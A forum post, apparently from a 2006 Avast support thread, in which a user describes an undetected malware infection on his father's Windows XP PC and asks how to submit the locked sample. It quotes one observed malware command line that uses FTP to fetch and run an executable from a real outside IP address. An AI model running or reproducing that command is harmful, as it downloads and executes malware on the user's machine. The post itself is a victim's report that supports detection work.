Hello,
we have the same malware here it seems.
It is seen the same way by PrevX1, and activate regularly some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launch them, and a lot of bad thinks !
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit
It is MSQRSM, non detected by Avast , neith erother anti-virus (NAV, Grisoft) ou anti spyware (Ad aware).
but detected by PREVX1
I’d like to send you the .exe file .exe (237kb) for analyse and integration in Avast database, but it is in c:\system volume information-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and non accessible.
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !
I am working remotely on my father’s PC, and cant boot on a DOS disck !
Any idea please to copy this file and send to you ?
It came by clicking a url in an HTML spam email … but I erased the email (just too soon…)
OS = OS Windows XP SP2 home à jour des updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+ 512 MB ram
messagerie Thunderbird
NAV + Avast
le logiciel lance des fenetres CMD avec des scripts de téléchargement TFTP xx, il empèche la connexion de mozilla et thunderdbird au web et comptes smtp / pop, il crée différents exe dans windows/system32, qui sont executés (vus dans le getionnaire des taches) etc. ASSEZ NOCIF…
Thanks
FX